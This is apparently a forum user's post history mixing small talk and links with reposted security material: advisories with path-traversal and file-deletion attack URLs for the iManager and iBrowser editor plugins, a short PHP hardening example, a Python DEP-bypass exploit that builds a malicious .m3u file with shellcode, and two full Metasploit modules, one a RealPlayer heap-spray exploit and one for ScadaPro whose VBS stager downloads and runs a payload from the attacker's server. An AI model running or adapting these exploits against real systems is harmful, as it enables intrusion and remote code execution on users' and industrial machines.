Everything posted by Gonzalez
Good news -Gonzalez

For connoisseurs - CEH v7 + SANS 504
Gonzalez replied to Un.Neuron's topic in Tutorials in English
Thanks. -Gonzalez

Thanks for the site. -Gonzalez
Check out: http://php.opensourcecms.com/scripts/show.php?catid=1&category=CMS%20/%20Portals -Gonzalez

I also think it was built from scratch; I couldn't find it on Google. -Gonzalez

What script do the people at vplay.ro use? Is it custom, or can I find it on Google? I tried searching for a PHP script but didn't come across any script that resembles the one at vPlay. Does anyone know where I can find that script? -Gonzalez

Social bookmarking sites for those doing SEO. http://www.social-bookmarking-sites-list.com/ -Gonzalez

I didn't search, my mistake. -Gonzalez

They were checked a few months ago.
Best encryption for network security. http://www.crypo.com/ -Gonzalez

Thanks for the link. -Gonzalez

iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability

Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.2.8 Build 02012008

Summary: With iManager you can manage your files/images on your webserver, and it provides a user interface to most of the phpThumb() functions. It works either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor.

Desc: Input passed to the 'd' parameter in /scripts/phpCrop/crop.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the 'd' parameter.

======================================================================
/scripts/phpCrop/crop.php:
----------------------------------------------------------------------
32: if( isset($_REQUEST['s']) ) {
33:   //delete previous temp files
34:   $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE);
35:   if ( is_array ( $matches ) ) {
36:     foreach ( $matches as $fn) {
37:       @unlink($fn);
38:     }
39:   }
======================================================================

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com

Advisory ID: ZSL-2011-5043
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php

15.09.2011

--

http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00

iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability

Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.2.8 Build 02012008

Summary: With iManager you can manage your files/images on your webserver, and it provides a user interface to most of the phpThumb() functions. It works either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor.

Desc: iManager suffers from a file inclusion vulnerability (LFI) / file disclosure vulnerability (FD) when input passed thru the 'lang' parameter to imanager.php, rfiles.php, symbols.php, colorpicker.php, loadmsg.php, ov_rfiles.php and examples.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.

======================================================================
/langs/lang.class.php:
----------------------------------------------------------------------
67: function loadData() {
68:   global $cfg;
69:   include( dirname(__FILE__) . '/' . $this -> lang.'.php' );
70:   $this -> charset = $lang_charset;
71:   $this -> dir = $lang_direction;
72:   $this -> lang_data = $lang_data;
73:   unset( $lang_data );
74:   include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );
75:   $this -> default_lang_data = $lang_data;
76: }
======================================================================

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com

Advisory ID: ZSL-2011-5042
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5042.php

15.09.2011

--

http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/imanager.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/colorpicker.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/ov_rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/images/examples/examples.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00

iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability

Vendor: net4visions.com
Product web page: http://www.net4visions.com
Affected version: <= 1.4.1 Build 10182009

Summary: iBrowser is an image browser plugin for WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor developed by net4visions. It allows image browsing, resizing on upload, directory management and more with the integration of the phpThumb image library.

Desc: iBrowser suffers from a file inclusion vulnerability (LFI) / file disclosure vulnerability (FD) when input passed thru the 'lang' parameter to ibrowser.php, loadmsg.php, rfiles.php and symbols.php is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.

======================================================================
/langs/lang.class.php:
----------------------------------------------------------------------
67: function loadData() {
68:   global $cfg;
69:   include( dirname(__FILE__) . '/' . $this -> lang.'.php' );
70:   $this -> charset = $lang_charset;
71:   $this -> dir = $lang_direction;
72:   $this -> lang_data = $lang_data;
73:   unset( $lang_data );
74:   include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );
75:   $this -> default_lang_data = $lang_data;
76: }
======================================================================

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.14 (Win32)
           PHP 5.3.1
           MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com

Advisory ID: ZSL-2011-5041
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5041.php

15.09.2011

--

http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
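The two unchecked inputs the iManager/iBrowser advisories above describe (the 'lang' value fed to include() and the 'd' directory fed to glob()/unlink()) can be closed with an allowlist and a base-directory containment check. The following is an added PHP example, not code from the advisories or from the net4visions plugins; the function names, the language allowlist and the temporary directory layout are assumptions made for the example.

```php
<?php
// Added example (not from the net4visions advisories or the iManager/iBrowser
// source): hardening the two inputs the advisories describe. Function and
// constant names are assumptions for the example.
declare(strict_types=1);

/** Allowlisted language codes; a constructed list standing in for /langs/*.php. */
const ALLOWED_LANGS = ['en', 'de', 'fr'];

/**
 * Replacement for the advisory's include(dirname(__FILE__).'/'.$lang.'.php'):
 * the value is matched against an allowlist, so "../", NUL bytes or absolute
 * paths never reach include(). Returns the file to include, or null if the
 * requested code is not known.
 */
function langFile(string $langsDir, ?string $requested): ?string
{
    if ($requested === null || !in_array($requested, ALLOWED_LANGS, true)) {
        return null;
    }
    $path = $langsDir . DIRECTORY_SEPARATOR . $requested . '.php';
    return is_file($path) ? $path : null;
}

/**
 * Replacement for glob($d . '{*.jpg,*.JPG}') on an unchecked 'd' parameter:
 * canonicalise the requested directory and require it to stay inside $baseDir.
 * Returns the canonical directory, or null if the request escapes the base.
 */
function containedDir(string $baseDir, string $userDir): ?string
{
    // NUL bytes truncate C-level paths; refuse them before touching the filesystem.
    if (strpos($userDir, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    $dir  = realpath($baseDir . DIRECTORY_SEPARATOR . $userDir);
    if ($base === false || $dir === false) {
        return null;
    }
    // Accept the base itself or a descendant; the trailing separator stops
    // ".../temp" from matching ".../temp2".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($dir !== $base && strncmp($dir, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $dir;
}

// Self-check on a constructed layout under the system temp directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'imanager_demo_' . bin2hex(random_bytes(4));
mkdir("$root/langs", 0700, true);
mkdir("$root/temp/crop", 0700, true);
file_put_contents("$root/langs/en.php", "<?php\n\$lang_charset = 'utf-8';\n");
file_put_contents("$root/secret.txt", "not a thumbnail\n");

$cases = [
    ['lang', 'en',                 langFile("$root/langs", 'en') !== null],
    ['lang', "../../secret.txt\0", langFile("$root/langs", "../../secret.txt\0") === null],
    ['d',    'crop',               containedDir("$root/temp", 'crop') !== null],
    ['d',    '../../..',           containedDir("$root/temp", '../../..') === null],
    ['d',    "../secret.txt\0",    containedDir("$root/temp", "../secret.txt\0") === null],
];
foreach ($cases as [$param, $value, $ok]) {
    printf("%-4s %-20s %s\n", $param, addcslashes($value, "\0"), $ok ? 'handled' : 'FAILED');
}

// Remove the constructed layout again.
unlink("$root/secret.txt"); unlink("$root/langs/en.php");
rmdir("$root/temp/crop"); rmdir("$root/temp"); rmdir("$root/langs"); rmdir($root);
```

Every case should print "handled"; the traversal and NUL-byte values are rejected before any include(), glob() or unlink() call is made.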

# written to bypass OptIn/OptOut DEP policy
# tested on windows xp sp3 running in virtualbox

import sys

print "\n============================"
print " MY MP3 Player DEP Bypass "
print " Bypass OptIn/OptOut Policy "
print " Tested on Windows XP SP3 "
print " Written by Blake "
print "============================\n"

# calc.exe - 1014 bytes of space for shellcode
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")

buffer = "\x41" * 1024
eip = "\x99\x13\x09\x5d"    # RETN - COMCTL32
rop = "\x42" * 4            # junk to compensate
rop += "\x8c\x39\x09\x5d"   # POP EBX, RETN - COMCTL32
rop += "\xff\xff\xff\xff"
rop += "\x28\x90\x12\x77"   # INC EBX, RETN - OLEAUT32
rop += "\x44\x94\x12\x77"   # POP EBP, RETN - OLEAUT32
rop += "\xa4\x22\x86\x7c"   # SetProcessDEPPolicy
rop += "\x36\x1c\x12\x77"   # POP EDI, RETN - OLEAUT32
rop += "\x37\x1c\x12\x77"   # RETN - OLEAUT32
rop += "\xd4\x1a\x12\x77"   # POP ESI, RETN - OLEAUT32
rop += "\x37\x1c\x12\x77"   # RETN - OLEAUT32
rop += "\xf7\x8c\x14\x77"   # PUSHAD, RETN - OLEAUT32

nops = "\x90" * 20
junk = "\x42" * (2000 - len(nops + shellcode + rop))

print "[+] Creating malicious .m3u file"
try:
    file = open("exploit.m3u","w")
    file.write(buffer + eip + rop + nops + shellcode + junk)
    file.close()
    print "[+] File created"
except:
    print "[x] Could not create file"
raw_input("\nPress any key to exit...\n")

##
# $Id: realplayer_qcp.rb 13745 2011-09-17 06:48:33Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "RealNetworks Realplayer QCP Parsing Heap Overflow",
      'Description'    => %q{
          This module exploits a heap overflow in Realplayer when handling a .QCP file.
        The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is
        allocated on the heap and user-supplied data from the file is copied within a
        memory copy loop. This allows a remote attacker to execute arbitrary code running
        in the context of the web browser via a .QCP file with a specially crafted "fmt"
        chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.
      },
      'License'        => MSF_LICENSE,
      'Version'        => "$Revision: 13745 $",
      'Author'         =>
        [
          'Sean de Regge',  # Vulnerability discovery
          'juan vazquez'    # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2011-2950'],
          ['OSVDB', '74549'],
          ['BID', '49172'],
          # ZDI advisory
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-265/'],
          # Vendor advisory
          ['URL', 'http://service.real.com/realplayer/security/08162011_player/en/'],
          #Fix commit
          ['URL', 'http://lists.helixcommunity.org/pipermail/datatype-cvs/2011-April/015469.html'],
        ],
      'Payload'        =>
        {
          'Space'   => 1024
        },
      'DefaultOptions' =>
        {
          'ExitFunction'         => "process",
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'Internet Explorer 6 on XP SP3', { 'Nops' => "%u1414%u1414" } ],
          [ 'Internet Explorer 7 on XP SP3', { 'Nops' => "%u0c0c%u0c0c" } ],
        ],
      'DisclosureDate' => "Aug 16 2011",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
      ], self.class)
  end

  def get_target(cli, request)
    #Default target
    my_target = target

    vprint_status("User-Agent: #{request.headers['User-Agent']}")

    if target.name == 'Automatic'
      agent = request.headers['User-Agent']
      if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
        #Windows XP + IE 6
        my_target = targets[1]
      elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
        #Windows XP + IE 7.0
        my_target = targets[2]
      elsif agent =~ /RMA/
        #RealPlayer identifies itself as "RMA/1.0 (compatible; RealMedia)"
        #when requesting our trigger file
        return 'RMA'
      else
        #If we don't recognize the client, we don't fire the exploit
        my_target = nil
      end
    end

    return my_target
  end

  def exploit
    #Set trigger file name
    @filename = rand_text_alpha(rand(6) + 3)
    #Create the trigger file
    @trigger = build_trigger
    super
  end

  def on_request_uri(cli, request)
    #Pick the right target
    vprint_status("Selecting target...")
    my_target = get_target(cli, request)

    if my_target.nil?
      print_error("Target not supported")
      send_not_found(cli)
      return
    end

    vprint_status("URL: #{request.uri.to_s}")

    #Send the trigger file upon request
    if request.uri.match(/\.qcp$/)
      print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}")
      send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    vprint_status("Building shellcode...")
    code = Rex::Text.to_unescape(payload.encoded)

    vprint_status("Building spray...")
    spray = build_spray(my_target, code)

    #obfuscate on demand
    vprint_status("Obfuscating javascript...")
    if datastore['OBFUSCATE']
      spray = Rex::Exploitation::JSObfu.new(spray)
      spray.obfuscate
    end

    vprint_status("Building html...")
    #Value for the 'Src' parameter of our ActiveX control
    trigger_file = ""
    if ("/" == get_resource[-1,1])
      trigger_file = get_resource[0, get_resource.length - 1]
    else
      trigger_file = get_resource
    end
    trigger_file << "/#{@filename}.qcp"

    html = <<-EOS
<HTML>
<HEAD>
</HEAD>
<BODY>
<script language='javascript'>
#{spray}
</script>
<OBJECT ID=RVOCX CLASSID="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH=320 HEIGHT=240>
<PARAM NAME="SRC" VALUE="#{trigger_file}">
<PARAM NAME="CONTROLS" VALUE="ImageWindow">
<PARAM NAME="CONSOLE" VALUE="one">
<PARAM NAME="AUTOSTART" VALUE="true">
<EMBED SRC="#{trigger_file}" WIDTH=320 HEIGHT=240 NOJAVA=true CONTROLS=ImageWindow CONSOLE=one AUTOSTART=true>
</OBJECT>
</BODY>
    EOS

    print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...")
    send_response( cli, html, {'Content-Type' => 'text/html'} )
  end

  def build_trigger()
    overflow_size = 700
    overflow_string = "\x11" * 700
    #riff_mark
    trigger = "\x52\x49\x46\x46"
    #total_size
    trigger << [0xed44 + overflow_size].pack("V")
    #qlcm_tag
    trigger << "\x51\x4c\x43\x4d"
    #fmt_tag
    trigger << "\x66\x6d\x74\x20"
    #fmt_size
    trigger << [0x96 + overflow_size].pack("V")
    #fmt_content
    trigger << "\x01\x00\x8d\xd4\x89\xe6\x76\x90"
    trigger << "\xb5\x46\x91\xef\x73\x6a\x51\x00"
    trigger << "\xce\xb4\x01\x00\x54\x49\x41\x20"
    trigger << "\x49\x53\x2d\x31\x32\x37\x20\x45"
    trigger << "\x6e\x68\x61\x6e\x63\x65\x64\x20"
    trigger << "\x56\x61\x72\x69\x61\x62\x6c\x65"
    trigger << "\x20\x52\x61\x74\x65\x20\x43\x6f"
    trigger << "\x64\x65\x63\x2c\x20\x53\x70\x65"
    trigger << "\x65\x63\x68\x20\x53\x65\x72\x76"
    trigger << "\x69\x63\x65\x20\x4f\x70\x74\x69"
    trigger << "\x6f\x6e\x20\x33\x20\x00\x00\x00"
    trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
    trigger << "\x00\x00\x00\x00\xc8\x32\x16\x00"
    trigger << "\xa0\x00\x40\x1f\x10\x00\x05\x00"
    trigger << "\x00\x00\x16\x04\x0a\x03\x05\x02"
    trigger << "\x02\x01\x00\x00\x00\x00\x00\x00"
    trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
    trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
    trigger << "\x00\x00\x00\x00\x00\x00"
    trigger << overflow_string
    #vrat_tag
    trigger << "\x76\x72\x61\x74"
    #vrat_size
    trigger << [0x8].pack("V")
    #vrat_content
    trigger << "\x01\x00\x00\x00\x06\x13\x00\x00"
    #data_tag
    trigger << "\x64\x61\x74\x61"
    #data_size
    trigger << [0xec8a].pack("V")
    #data_content
    trigger << rand_text_alpha(0xec8a)
    return trigger
  end

  def build_spray(mytarget, code)
    spray = <<-JS
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{code}");
    var nops = unescape("#{mytarget['Nops']}");
    while (nops.length < 0x10000) nops += nops;
    offset = nops.substring(0, 0x7BE0);
    var shellcode = offset + code + nops.substring(0, 0x8000-offset.length-code.length);
    while (shellcode.length < 0x20000) shellcode += shellcode;
    block = shellcode.substring(0, (0x10000-6)/2);
    heap_obj.gc();
    for (var i=0; i < 0x1400; i++) {
      heap_obj.alloc(block);
    }
    JS
    spray = heaplib(spray)
    return spray
  end

end

##
# $Id: scadapro_cmdexe.rb 13737 2011-09-16 08:23:59Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Measuresoft ScadaPro <= 4.0.0 Remote Command Execution',
      'Description'    => %q{
          This module allows remote attackers to execute arbitrary commands on the
        affected system by abusing via Directory Traversal attack when using the
        'xf' command (execute function). An attacker can execute system() from
        msvcrt.dll to upload a backdoor and gain remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma',                           # Initial discovery/poc
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf
          'TecR0c <tecr0c[at]tecninja.net>',          # msf
        ],
      'Version'        => '$Revision: 13737 $',
      'References'     =>
        [
          #[ 'CVE', '?'],
          #[ 'OSVDB', '?'],
          [ 'BID', '49613'],
          [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
          [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
          # seemed pretty accurate to us
          [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
        ],
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # truly universal
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 16 2011'))

    register_options(
      [
        Opt::RPORT(11234),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
      ], self.class)
  end

  # couldn't generate a vbs or exe payload and then use the wF command
  # as there is a limit to the amount of data to write to disk.
  # so we just write out a vbs script like the old days.
  def build_vbs(url, stager_name)
    name_xmlhttp = rand_text_alpha(2)
    name_adodb = rand_text_alpha(2)
    tmp = "#{@temp_folder}/#{stager_name}"

    vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
    vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
    vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
    vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
    vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
    vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
    vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
    return vbs
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.exe/
      print_status("Sending 2nd stage payload to #{cli.peerhost}:#{cli.peerport}...")
      return if ((p=regenerate_payload(cli)) == nil)
      data = generate_payload_exe( {:code=>p.encoded} )
      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
      return
    end
  end

  def exploit
    # In order to save binary data to the file system the payload is written to a .vbs
    # file and execute it from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder = "C:/Windows/Temp"

    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end

    payload_src = lhost
    payload_src << ":" << datastore['SRVPORT'] << datastore['URIPATH'] << @payload_name << ".exe"

    stager_name = rand_text_alpha(6) + ".vbs"
    stager = build_vbs(payload_src, stager_name)

    path = "..\\..\\..\\..\\..\\windows\\system32"
    createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
    download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

    print_status("Sending 1st stage payload...")
    connect
    sock.get_once()
    sock.put(createvbs)
    sock.get_once()
    sock.put(download_execute)
    handler()
    disconnect
    super
  end

end
Coldplay - Violet Hill.mp3 -Gonzalez
Try Goooogle. -Gonzalez

NOW: Leone ft sierra refugee all stars - Big lesson -Gonzalez

NOW: Alpha blondy - Alpha kaya -Gonzalez

Contact the Support-Team at both hosts. -Gonzalez